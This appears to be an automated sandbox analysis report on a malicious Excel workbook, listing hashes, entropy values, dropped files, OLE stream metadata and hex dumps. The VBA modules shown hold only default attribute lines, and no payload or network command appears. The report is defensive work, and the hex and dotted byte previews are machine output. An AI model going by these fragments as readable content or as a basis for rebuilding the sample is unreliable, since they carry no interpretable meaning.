                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 07:24:08 2024, Security: 1
                Category:dropped
                Size (bytes):1123840
                Entropy (8bit):7.744269957296979
                Encrypted:false
                SSDEEP:24576:iBajbARM8A18Z+jZ+X+VcVtsnV6+05dpd:ihU1XjZ+uaNb3
                MD5:59B463677F083CB8BF771E27162EF915
                SHA1:D97B1CDBB09E2B4B93F8DE903460FADE41382FF0
                SHA-256:C306DAEB532D48D6F51F35C1612D9BED38E854AA80EB86F14513C06A6BEE67D7
                SHA-512:C8C45E4A7F43E6FF3E60D44367FF43E24753E670DCF9E7D3EBF2D6444AFF7A46C612362B0F83B3683B23098C2F67EE528541FF5D3654D56BA018FA1C018B10A6
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:......................>.......................................................i...j...k...l...m...............V...W...r.......g.......i...................................................................................................................................................................................................................................................................................................................................................................................................h...........................................................................................................U... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...............................o...p...q...r...s...t...u...v...w...x...y...z...

                C:\Users\user\AppData\Local\Temp\~DFE5398C9B16B3B9D9.TMP

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Dec 20 07:24:08 2024, Security: 1
                Entropy (8bit):7.744269957296979
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:MS100384UTC.xls
                File size:1'123'840 bytes
                MD5:59b463677f083cb8bf771e27162ef915
                SHA1:d97b1cdbb09e2b4b93f8de903460fade41382ff0
                SHA256:c306daeb532d48d6f51f35c1612d9bed38e854aa80eb86f14513c06a6bee67d7
                SHA512:c8c45e4a7f43e6ff3e60d44367ff43e24753e670dcf9e7d3ebf2d6444aff7a46c612362b0f83b3683b23098c2f67ee528541ff5d3654d56ba018fa1c018b10a6
                SSDEEP:24576:iBajbARM8A18Z+jZ+X+VcVtsnV6+05dpd:ihU1XjZ+uaNb3
                TLSH:763501E5738DAB52C609563575F393AE1714AC03E902423B36F8B31D1AFB6D08643F9A
                File Content Preview:........................>.......................................................i...j...k...l...m...............V...W...r.......g.......i......................................................................................................................

                File Icon

                Icon Hash:35ed8e920e8c81b5

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "MS100384UTC.xls"

                Indicators
                Has Summary Info:
                Application Name:Microsoft Excel
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:True
                Summary
                Code Page:1252
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2024-12-20 07:24:08
                Creating Application:Microsoft Excel
                Security:1
                Document Summary
                Document Code Page:1252
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:786432

                Streams with VBA

                VBA File Name: Sheet1.cls, Stream Size: 977
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                VBA File Name: Sheet2.cls, Stream Size: 977
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                VBA File Name:Sheet2.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                VBA File Name: ThisWorkbook.cls, Stream Size: 985
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook.cls
                Stream Size:985
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                VBA File Name: Sheet1.cls, Stream Size: 977
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e2 09 fd 9d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                VBA File Name: Sheet2.cls, Stream Size: 977
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                VBA File Name:Sheet2.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e2 09 09 b0 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                General
                Stream Path:\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:244
                Entropy:2.889430592781307
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                General
                Stream Path:\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:200
                Entropy:3.260350317504982
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . \\ 7 ( R . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                Stream Path: MBD006207A4/\x1CompObj, File Type: data, Stream Size: 99
                General
                Stream Path:MBD006207A4/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A4/Package, File Type: Microsoft Excel 2007+, Stream Size: 12479
                General
                Stream Path:MBD006207A4/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:12479
                Entropy:7.0945112382968425
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a7 95 f9 99 84 01 00 00 14 06 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A5/\x1CompObj, File Type: data, Stream Size: 99
                General
                Stream Path:MBD006207A5/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A5/Package, File Type: Microsoft Excel 2007+, Stream Size: 37036
                General
                Stream Path:MBD006207A5/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:37036
                Entropy:7.720975169587741
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . 8 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b7 a1 38 de e3 01 00 00 cb 09 00 00 13 00 e9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 e5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A6/\x1CompObj, File Type: data, Stream Size: 114
                General
                Stream Path:MBD006207A6/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A6/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                General
                Stream Path:MBD006207A6/\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:244
                Entropy:2.701136490257069
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                Stream Path: MBD006207A6/\x5SummaryInformation, File Type: data, Stream Size: 220
                General
                Stream Path:MBD006207A6/\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:220
                Entropy:3.372234242231489
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                Stream Path: MBD006207A6/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
                General
                Stream Path:MBD006207A6/MBD0018D4CE/\x1Ole
                CLSID:
                File Type:data
                Stream Size:20
                Entropy:0.5689955935892812
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A6/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
                General
                Stream Path:MBD006207A6/MBD0018D4CE/\x3ObjInfo
                CLSID:
                File Type:data
                Stream Size:4
                Entropy:0.8112781244591328
                Base64 Encoded:False
                Data ASCII:. . . .
                Data Raw:00 00 03 00
                Stream Path: MBD006207A6/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
                General
                Stream Path:MBD006207A6/MBD0018D4CE/Contents
                CLSID:
                File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                Stream Size:197671
                Entropy:6.989042939766534
                Base64 Encoded:True
                Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A6/MBD0068D442/\x1CompObj, File Type: data, Stream Size: 114
                General
                Stream Path:MBD006207A6/MBD0068D442/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.219515110876372
                Base64 Encoded:False
                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A6/MBD0068D442/Package, File Type: Microsoft Excel 2007+, Stream Size: 26243
                General
                Stream Path:MBD006207A6/MBD0068D442/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:26243
                Entropy:7.635433729726103
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A6/MBD007203CB/\x1CompObj, File Type: data, Stream Size: 114
                General
                Stream Path:MBD006207A6/MBD007203CB/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A6/MBD007203CB/\x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                General
                Stream Path:MBD006207A6/MBD007203CB/\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:248
                Entropy:3.0523231150355867
                Base64 Encoded:False
